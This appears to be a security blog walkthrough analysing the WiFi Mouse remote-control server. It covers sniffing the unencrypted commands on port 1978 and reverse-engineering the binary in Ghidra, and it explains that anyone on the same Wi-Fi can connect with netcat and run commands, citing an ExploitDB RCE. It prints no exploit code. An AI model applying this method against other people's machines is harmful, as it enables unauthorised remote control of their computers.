In this article, we will understand the working of wifimouse. wifimouse is a way to control your laptop/PC with your phone. You can view files of your system. play, and pause the music of your device. you can control everything literally through your phone. it is available for Windows/Mac/Linux.
- Software-Link: https://wifimouse.necta.us/apk
- RCE bug: https://www.redpacketsecurity.com/wifi-mouse-code-execution/
I saw this exploit on ExploitDB, an RCE exploit python script. So, there was a bug in `wifimouse 1.7.8.5` which could lead an attacker to execute commands on the victim’s PC. I won’t be able to create this vulnerable scenario to illustrate to you guys since I couldn’t find this version (1.7.8.5) anywhere. Its official website is only keeping the updated version. But I will try to explain it’s working. This article will cover some reverse engineering and if you are not familiar with it, you should learn it first and you can come back later.
I have wifimouse server installed on my second windows laptop. And in order to connect with it, I will install wifimouse app on my android phone. Both of your devices must be in the same network (connected to the same wifi).
As you can see, I have connected to my windows server as a client. I can do some actions using this app which will be performed on my Windows laptop. A basic example of this would be moving the cursor. I can type something in the input field.
We can do many more things with it but I want to show you the other side of it. I want to show what is happening on both sides (network packets). let’s start our Wireshark to start capturing packets. Remember that the IP of my windows machine is `10.42.0.237` and the IP of my android is `10.42.0.32`. and the port on which this wifimouse server runs is `1978`. doesn’t it sounds like a year (just kidding)?
so, we can use this filter in Wireshark to get the desired result.
It seems that packets are not encrypted at all. Look at the highlighted value.
`Data: 6d6f732020376d2038202d3331`
if you decode hex this, you will get the command which is being sent by your phone to the windows.
`mos 7m 8 -31`
These seem like positions for the mouse cursor. and that’s exactly what we are sending to the windows. There are more actions we can perform here and examine what is being sent.
For example, I can start a command prompt.
The output of Wireshark:
This is really amazing, right? But dangerous as well. Because you have exposed service on your home wifi or public wifi network which can run applications and access files on of your system.
At this point, I wanted to know how it works. so, I moved on to reverse the binary of wifimouse. To be honest, I really hate reverse engineering in Windows. so, I used elf binary. which I extracted from a DEB package.
mkdir temp/; cd temp
wget https://wifimouse.necta.us/apk/mouseserver-32.deb
dpkg-deb -R mouseserver-32.deb mouseserver
ls mouseserverThe additional info which is required when you are installing this deb package is stored in `mouseserver/DEBIAN/*`
cat mouseserver/DEBIAN/*And the binary file is stored in `mouseserver/usr/sbin/mouseserver`
02:56:46 root@kali-lucky wifimouse → file mouseserver/usr/sbin/mouseserver
mouseserver/usr/sbin/mouseserver: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=904e7731618a5f24ab59a0d579b04b0a62816bfa, stripped
ls -la mouseserver/usr/sbin/mouseserverAs we can see we have a 32bit stripped binary. which means we are going to face some problems while reading function names. I am going to use the NSA tool `Ghidra` here. you can use any other tool you like. I can search for the `main` function if it is visible. and even though it is a stripped binary, I can see its main function (no idea).
main function decompiled:
Look at this code yourself :
https://gist.github.com/luckythandel/3a5c951b83745ee1cc9ecac3feb37819
It is creating a socket with port 0x7BA (1978). Then there is binding and listening on that port.
Thread one:
iVar3 = pthread_create(&local_7c,(pthread_attr_t *)0x0,GTKStartup,(void *)0x0);sounds like it is creating the GUI menu for the wifimouse server which we can access from our taskbar.
Then there are these two UDP socket connection threads, which might be useful while transferring a file (maybe).
iVar3 = pthread_create(&local_70,(pthread_attr_t *)0x0,udpsender,(void *)0x0);
iVar3 = pthread_create(&local_70,(pthread_attr_t *)0x0,udpserver,(void *)0x0);And finally, we have this `MobileMouseSession` which seems like a display log function. it prints all the user-requested commands to display.
https://gist.github.com/luckythandel/e465b0c582defc975655150b13903db3
There is a function in the `MobileMousrSession` Thread named `process` taking one argument (string). it is the function which handles all the commands (requests) of the users. For example, the mouse cursor which we are controlling through our phone is being run over here. It is so long. but most of the code is to handle the keyboard and mouse stuff which you can ignore.
https://gist.github.com/luckythandel/266f0f1c90e10658924b6e78a16cb3cf
But I noticed one thing in the Linux version there are a few commands missing in it. for example, the  `fileexplorer.
You can write your own socket script in Python or any other language or simply connect with a port 1978 using netcat. Isn’t that obvious and interesting at the same time? Look at the following image.
Actually, I had to restart the windows wifimouse server back again because it has most of the commands which the Linux binary is lack. But you can see that I can successfully connect with the wifimouse server. Now you can think of a scenario where you are on public wifi and someone is using this application or some similar application. in this situation, you as an attacker can take advantages of this. since the port is accessible on a wireless interface, you will be able to connect to it and execute the commands on the user’s server.
The exploit which I mentioned previously works the same way. the command `openfile` (windows) is exploited in that case. You can read the exploit here. unfortunately, I am not able to demonstrate this.
